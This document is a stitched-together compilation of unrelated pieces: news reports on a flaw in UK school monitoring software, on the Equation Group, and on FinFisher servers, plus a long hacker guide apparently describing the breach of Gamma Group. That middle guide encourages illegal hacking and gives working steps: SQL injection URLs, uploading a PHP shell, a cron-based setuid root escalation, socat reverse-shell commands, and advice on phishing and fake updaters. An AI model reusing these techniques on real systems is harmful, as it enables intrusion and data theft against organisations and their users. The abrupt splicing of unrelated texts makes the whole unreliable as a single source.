One of the most widely used tools for Schools monitoring kids and restricting pupils’ internet use in UK schools has a serious security flaw which could leave hundreds of thousands of children’s personal information exposed to hackers, a researcher has warned.
Impero Education Pro, a product that restricts and monitors’ students’ website use and searches, is used in 27% of UK secondary schools, according to the company. In a controversial pilot programme, a version of the software looks for extremism-related searches such as “jihadi bride”.
But last month the security researcher Zammis Clark posted extensive details of a flaw in the company’s encryption protocols which could allow almost anyone to gain full access to computers running the Impero software, run software such as spyware on the systems, or access files and records stored on them.
The company said it had released a temporary security patch and was working on a permanent upgrade.
Clark said the flaw he found would leave affected schools’ networks “completely pwned”, online slang meaning in this context that the networks’ security would be fully compromised and information on it would be rendered vulnerable.
He said he had posted it publicly, rather than privately disclosing it to the company, for several reasons. “One was that I was against the ‘anti-extremism’ stuff, the other was because not being a customer, I didn’t know where to send it.”
Schools using Impero’s software said the company had notified them of the security flaw in the middle of last month but they were offered few details of its potential scale.
One school IT manager said the response from Impero was vague and required managers to contact the firm for more information. “Impero are crap at communication,” he said.
Three schools and chains using the software that were approached by the Guardian said the company had been slow to deliver promised software patches. Impero also offered fixes to schools that were using the software without contractual support, but left it up to those schools to make contact.
One school said the most recent update on the situation from Impero arrived by email on Monday.
The company is known on school tech forums for its pushy sales techniques, but the software remains popular because of the lack of quality alternatives.
Impero stressed that no data had been compromised, it had already issued a temporary fix for the vulnerability and it would install a full solution before the start of the next academic year.
“On 13 June 2015, we were made aware that someone had maliciously and illegally hacked our product, subsequently making this hack public rather than bringing it to our attention privately and in confidence. No customers have been affected by this and no data has been leaked or compromised,” it said.
“We immediately released a hot fix, as a short-term measure, to address the issue and since then we have been working closely with our customers and penetration testers to develop a solid long-term solution. All schools will have the new version, including the long-term fix, installed in time for the new school term.”
The company said “the methods used to identify and communicate this particular issue were not legal” and they would take a “firm stance”.
“Impero Education Pro is designed to protect and safeguard children in schools and any attempt to jeopardise this by illegally obtaining and publicising sensitive information will be dealt with appropriately,”it said.
On Monday, a month after Clark first disclosed the software vulnerability, lawyers acting for Impero demanded in a letter that he should remove all of his online postings about the company, under the threat of civil proceedings for breach of confidence and copyright infringement and criminal proceedings under the computer misuse act. The letter admits the potential seriousness of the vulnerability Clark disclosed in schools’ systems.
“By publicising the encryption key on the internet and on social media and other confidential information, you have enabled anyone to breach the security of our client’s software program and write destructive files to disrupt numerous software systems throughout the UK,” it said.
Impero said the hack “could only be exploited if basic network security does not exist” and would require the hacker to be physically present in a school.
Publicly disclosing details of security vulnerabilities is a controversial practice in the online security world. Some believe private disclosure is better initially, as it gives companies time to fix flaws before they are made public, but it rarely results in legal action.
Mustafa al-Bassam, a security engineer and former member of the hacking collective Lulzsec, said the legal threat against Clark was bizarre, especially when such exploits can be used or sold for profit, rather than posted online to be fixed.
“Responding with a legal threat to a security researcher that highlighted a serious security flaw in your software is bizarre and shows utter disregard for customers,” he said.
“Unfortunately it shows a theme that is too common in the software industry: companies view security as an external PR issue because it often affects their customers more than it affects them. And they should be grateful that this security flaw was disclosed publicly instead of being sold to malware developers like Hacking Team.”
Impero’s Education Pro software serves a variety of roles in schools’ systems, including blocking inappropriate web surfing – such as adult sites – and monitoring students’ activity, as well as rationing printing and making IT administration simpler.
However, last month – just days before Clark discovered the flaw – the Guardian reported Impero was offering a new feature to monitor keywords potentially tied to terrorism or extremism before the implementation of new counter-terrorism legislation introducing a requirement on schools to monitor pupils for such signs.
The pilot, introduced in 16 UK schools and five in the US, monitors for phrases such as “YODO” – You Only Die Once – “War on Islam”, and “Storm Front”, a neo-Nazi group.
The Department for Education said: “We have been clear that schools are expected to ensure that sensitive pupil information is held securely. The Data Protection Act of 1998 is clear what standards schools are expected to adhere to and we provide guidance on this.”
An unnamed scientific researcher walks out to her mailbox, shuffles through some bills and advertisements, and pulls out an envelope containing a CD of pictures from a recent scientific conference the researcher had attended in Houston. Excited – though maybe a bit nervous – to see the candid photos of herself and her colleagues snapped by an excitable event photographer, the researcher walks inside, casually drops the unopened bills on the kitchen table, opens up her laptop, and slides in the CD. Windows asks if she’d like to open the pictures to view them. She accepts, and the pictures pop up in the photo viewer. One by one she clicks through them, viewing the photos from the event. She reminisces fondly, wincing only at that one photo where she looks either drunk or high, making mental note of the pictures to print out for her lab desk.
What the researcher doesn’t see, however, is a malicious payload – a virus, one of the most sophisticated known to man – secretly installing itself in the background of her computer. This virus would give a certain secret group of individuals complete access to her system, a group which had hijacked the package mid-transit in the mail, replaced the original CD with a copy that included the virus, taped everything back up without evidence of tampering, and sent the package on its way to her. The virus was practically untraceable and completely irremovable; it could map out networks, jump to computers not connected via the Internet, and even selectively target and destroy specific computers much like a bioengineered nano-virus – all at the direction of a secret shadow organization that was covertly infiltrating the world’s most secure computer systems.
The Equation Group
What may sound like the start to a Tom Clancy novel, or an episode of 24, is, in fact, completely real, the likes of which actually happened to one or more researchers back in 2009. In fact, surreptitious, interdiction-based cyberattacks like this one have apparently been happening since at least the early 2000s and may date back to 1996.
Last Monday, Moscow-based Kaspersky Lab released a cybersecurity report uncovering details about the most sophisticated, covert, and pervasive hacker groups known to man and possibly ever imagined. The organization, dubbed the Equation Group due to the group’s affinity towards sophisticated encryption methods, had operated practically undetected for over a decade, silently infecting computers across the globe and delivering attack payloads still unknown.
“There is nowhere I can’t go. There is nowhere I won’t find you.” – Bane, The Matrix Revolutions
Kaspersky Lab, a cybersecurity firm known primarily for its antivirus software, is no stranger to hackers. The company tracks and documents security breaches of all shapes and sizes.
For years, most high-profile computer hacks had been primarily the work of individuals or small groups motivated by curiosity or, more recently, financial interest – gray-collar criminals who would infiltrate computer systems for credit card numbers to sell on the black market. Usually these attacks are relatively unsophisticated, relying on bad operational cybersecurity practices (dubbed “opsec”) from corporations to create exploitable security holes like those seen in the recent Target and Home Depot security breaches. Only upon the discovery of the Stuxnet virus in June 2010 that sabotaged Iran’s Natanz uranium enrichment facilities have cybersecurity researchers and the public at large turned an eye towards advanced persistent threats (APTs) which use advanced hacking techniques capable of bypassing strong opsec protocols.
What make Equation Group so impressive are their “almost superhuman” technical feats, which include never-before-seen levels of ingenuity in hacking, engineering, and encryption. Those feats include:
- using virtual file systems like those found in the Regin (a.k.a. WarriorPride) malware attack used by the NSA to infect overseas computers;
- the ability to infect and surveil sensitive air-gapped (i.e. non-Internet connected) networks by piggybacking on USB flash drives, much like the Stuxnet virus;
- encrypting malicious files and storing them in multiple branches of the Windows registry, making it immune to detect with antivirus software;
- using over 300 Internet domains and 100 servers to command and control malware infrastructure; and
- hijacking URL requests on iPhones to spoofed Mac servers, which indicates that Equation Group has compromised the iOS and OSX operating systems.
Perhaps most impressive is an Equation Group malware platform that rewrites the firmware of infected hard drives, allowing the virus to survive even low-level reformatting that is used to securely wipe a hard drive. All major hard drive manufacturers have drive models that have been compromised, including Western Digital, Seagate, Maxtor, Samsung, IBM, Toshiba, and Micron. Once the drive has been infected, the malware is completely impossible to detect or remove; the drive is compromised forever.
Forensics software displays, in Matrix-like fashion, some of the hard drives Equation Group was able to successfully hijack. (Credit: Kaspersky)
The difference in sophistication between your average Internet hacker and Equation Group cannot be understated. Your run-of-the-mill hacker is more or less equivalent to your run-of-the-mill burglar, who might break into a place with all of the sophistication of opening an unlocked door or busting out a window with a crowbar. APTs are more like museum thieves who might dress up like a guard or clone a keycard to snatch a valuable diamond or painting. Equation Group is an APT well beyond its peers, using super-spy tactics with analogical laser grids, vent shafts, and harnesses to swap a diamond with a perfect replica, remaining entirely undetected. It’s the stuff of Hollywood’s Mission: Impossible, only without the gratuitous explosions and Tom Cruise (…at least as far as anyone knows). And like Mission: Impossible, Equation Group is more than likely a clandestine operation of the U.S. government.
–[ 1 ]– Introduction
I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you’ve learned the basics you’ll realize this
really is easier than filing a FOIA request.
–[ 2 ]– Staying Safe
This is illegal, so you’ll need to take same basic precautions:
1) Make a hidden encrypted volume with Truecrypt 7.1a 
2) Inside the encrypted volume install Whonix 
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it’s better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy
As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.
NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you’ll want a public IP address to
receive connect back shells. I recommend using servers you’ve hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you’re running will
have a nice fast connection to your target.
–[ 3 ]– Mapping out the target
Basically I just repeatedly use fierce , whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.
For an example let’s take Blackwater. We start out knowing their homepage is at
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
Now we do whois lookups and find the homepage of www.academi.com is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: 184.108.40.206 – 220.127.116.11
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd
Doing a whois lookup on academi.com reveals it’s also registered to the same
address, so we’ll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
“850 Puddin Ridge Rd” inurl:ip-address-lookup
“850 Puddin Ridge Rd” inurl:domaintools
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you’ve found everything.
Also just google the organization and browse around its websites. For example on
academi.com we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:
If you repeat the whois lookups and such you’ll find academiproshop.com seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
was simply a whois lookup of finfisher.com which found it registered to the name
“FinFisher GmbH”. Googling for:
“FinFisher GmbH” inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com
…so now you’ve got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.
–[ 4 ]– Scanning & Exploiting
Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.
Now for each service you find running:
1) Is it exposing something it shouldn’t? Sometimes companies will have services
running that require no authentication and just assume it’s safe because the url
or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.
2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
3) Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:
1) Browse them. Especially on subdomains that fierce finds which aren’t intended
for public viewing like test.company.com or dev.company.com you’ll often find
interesting stuff just by looking at them.
2) Run nikto . This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.
3) Identify what software is being used on the website. WhatWeb is useful 
4) Depending on what software the website is running, use more specific tools
like wpscan , CMS-Explorer , and Joomscan .
First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it’s time to move
on to finding a new vulnerability:
5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP , and some combination of its
automated tests along with manually poking around with the help of its
6) For the non-custom software they’re running, get a copy to look at. If it’s
free software you can just download it. If it’s proprietary you can usually
pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that’s easier to hack, and get a copy from them.
For finsupport.finfisher.com the process was:
* Start nikto running in the background.
* Visit the website. See nothing but a login page. Quickly check for sqli in the
* See if WhatWeb knows anything about what software the site is running.
* WhatWeb doesn’t recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
* I view the page source to find a URL I can search on (index.php isn’t
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
* I find there’s a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.
At this point I can see the news stories that journalists will write to drum
up views: “In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group…”
But it’s really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:
* google allinurl:”Scripts/scripts.js.php” and find the other sites
* Notice they’re all sql injectable in the first url parameter I try.
* Realize they’re running Apache ModSecurity so I need to use sqlmap  with
the option –tamper=’tamper/modsecurityversioned.py’
* Acquire the admin login information, login and upload a php shell  (the
download the website’s source code.
Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 . It’s got sqli, LFI, file upload checks done client side in
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.
Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
sqli (it’s nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it’s
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap –file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.
Looking through the source, I see customers can attach a file to their support
tickets, and there’s no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I’m in!
–[ 5 ]– (fail at) Escalating
< got r00t? >
Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester , and unix-privesc-check .
finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer
so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
wait an hour, and ….nothing. Turns out that while the cron process is running
it doesn’t seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn’t update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that’s probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn’t get much of anything new, so I move
on to the rest of the network.
–[ 6 ]– Pivoting
The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.
The only interesting thing I could get on finsupport’s local network was another
webserver serving up a folder called ‘qateam’ containing their mobile malware.
–[ 7 ]– Have Fun
Once you’re in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there’s no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make due with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
already so I can move on to step 2!
–[ 8 ]– Other Methods
The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There’s no one right way, and any method that works is as good as
any other. The other main ways that I’ll state without going into detail are:
1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don’t
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There’s also
metasploit browser autopwn, but you’ll probably have better luck with no
exploits and a fake flash updater prompt.
2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: “Social Engineering”. This is probably the way to go if you don’t know
too much about computers, and it really is all it takes to be a successful
–[ 9 ]– Resources
(all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.
Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It’s also useful for setting up weird pivots and all kinds of other stuff.
* The Web Application Hacker’s Handbook
* Hacking: The Art of Exploitation
* The Database Hacker’s Handbook
* The Art of Software Security Assessment
* A Bug Hunter’s Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated
Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
–[ 10 ]– Outro
You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
customers are targeting and with what purpose that makes them evil. That’s not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it’s cheaper to attack than to defend it’s harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!
The FinFisher spyware made by U.K.- based Gamma Group likely has previously undisclosed global reach, with computers on at least five continents showing signs of being command centers that run the intrusion tool, according to cybersecurity experts.
FinFisher can secretly monitor computers — intercepting Skype calls, turning on Web cameras and recording every keystroke. It is marketed by Gamma for law enforcement and government use.
Bloomberg News reported July 25 that researchers believe they identified copies of FinFisher, following an examination of malware e-mailed to Bahraini activists. Their work, led by security researcher Morgan Marquis-Boire, was published the same day by the University of Toronto Munk School of Global Affairs’ Citizen Lab. Photographer: Jacob Kepler/Bloomberg
Research published last month based on e-mails obtained by Bloomberg News showed activists from the Persian Gulf kingdom of Bahrain were targeted by what looked like the software, sparking a hunt for further clues to the product’s deployment.
In new findings, a team, led by Claudio Guarnieri of Boston-based security risk-assessment company Rapid7, analyzed how the presumed FinFisher samples from Bahrain communicated with their command computer. They then compared those attributes with a global scan of computers on the Internet.
The survey has so far come up with what it reports as matches in Australia, the Czech Republic, Dubai, Ethiopia, Estonia, Indonesia, Latvia, Mongolia, Qatar and the U.S.
Guarnieri, a security researcher based in Amsterdam, said that the locations aren’t proof that the governments of any of these countries use Gamma’s FinFisher. It’s possible that Gamma clients use computers based in other nations to run their FinFisher systems, he said in an interview.
“They are simply the results of an active fingerprinting of a unique behavior associated with what is believed to be the FinFisher infrastructure,” he wrote in his report, which Rapid7 is publishing today on its blog at https://community.rapid7.com/community/infosec/blog.
The emerging picture of the commercially available spyware’s reach shines a light on the growing, global marketplace for cyber weapons with potential consequences.
“Once any malware is used in the wild, it’s typically only a matter of time before it gets used for nefarious purposes,” Guarnieri wrote in his report. “It’s impossible to keep this kind of thing under control in the long term.”
In response to questions about Guarnieri’s findings, Gamma International GmbH managing director Martin J. Muench said a global scan by third parties would not reveal servers running the FinFisher product in question, which is called FinSpy.
“The core FinSpy servers are protected with firewalls,” he said in an Aug. 4 e-mail.
Muench, who is based in Munich, has said his company didn’t sell FinFisher spyware to Bahrain. He said he’s investigating whether the samples used against Bahraini activists were stolen demonstration copies or were sold via a third party.
Gamma International GmbH in Germany is part of U.K.-based Gamma Group. The group also markets FinFisher through Andover, England-based Gamma International UK Ltd. Muench leads the FinFisher product portfolio.
Muench says that Gamma complies with the export regulations of the U.K., U.S. and Germany.
It was unclear which, if any, government agencies in the countries Guarnieri identified are Gamma clients.
A U.S. Federal Bureau of Investigation spokeswoman in Washington declined to comment.
Officials in Ethiopia’s Communications Minister, Qatar’s foreign ministry and Mongolia’s president’s office didn’t immediately return phone calls seeking comment or respond to questions. Dubai’s deputy commander of police said he has no knowledge of such programs when reached on his mobile phone.
Australia’s department of foreign affairs and trade said in an e-mailed statement it does not use FinFisher software. A spokesman at the Czech Republic’s interior ministry said he has no information of Gamma being used there, nor any knowledge of its use at other state institutions.
Violating Human Rights?
At Indonesia’s Ministry of Communications, head of public relations Gatot S. Dewa Broto said that to his knowledge the government doesn’t use that program, or ones that do similar things, because it would violate privacy and human rights in that country. The ministry got an offer to purchase a similar program about six months ago but declined, he said, unable to recall the name of the company pitching it.
The Estonian Information Systems Authority RIA has not detected any exposure to FinSpy, a spokeswoman said. Neither has Latvia’s information technologies security incident response institution, according to a technical expert there.
Bloomberg News reported July 25 that researchers believe they identified copies of FinFisher, following an examination of malware e-mailed to Bahraini activists. Their work, led by security researcher Morgan Marquis-Boire, was published the same day by the University of Toronto Munk School of Global Affairs’ Citizen Lab.
The new study builds on those findings, using the same samples of malicious software.
Guarnieri’s study found, among other things, that the Bahrain server answered anyone connecting to it with the message, “Hallo Steffi.”
The investigators then found this pattern in other computers by searching data from an Internet survey research project, Critical.IO, which has been cataloging publicly accessible computers around the world.
The researchers then developed a map that shows the location of the servers, along with their unique IP addresses on the Internet.
Gamma’s Muench said none of its server components sends out strings such as “Hallo Steffi.”
The earlier Citizen Lab research linked the malware sent to the activists to FinSpy, part of the FinFisher spyware tool kit.
The Citizen Lab research showed the malware took screen shots, intercepted voice-over-Internet calls and transmitted a record of every keystroke to a computer in Manama, the capital of Bahrain, which has been gripped by tension since a government crackdown on protests last year.
Muench said the computer found in Manama isn’t a FinFisher product. Instead, the server very likely runs custom-built software used to forward traffic between two or more other systems, he said.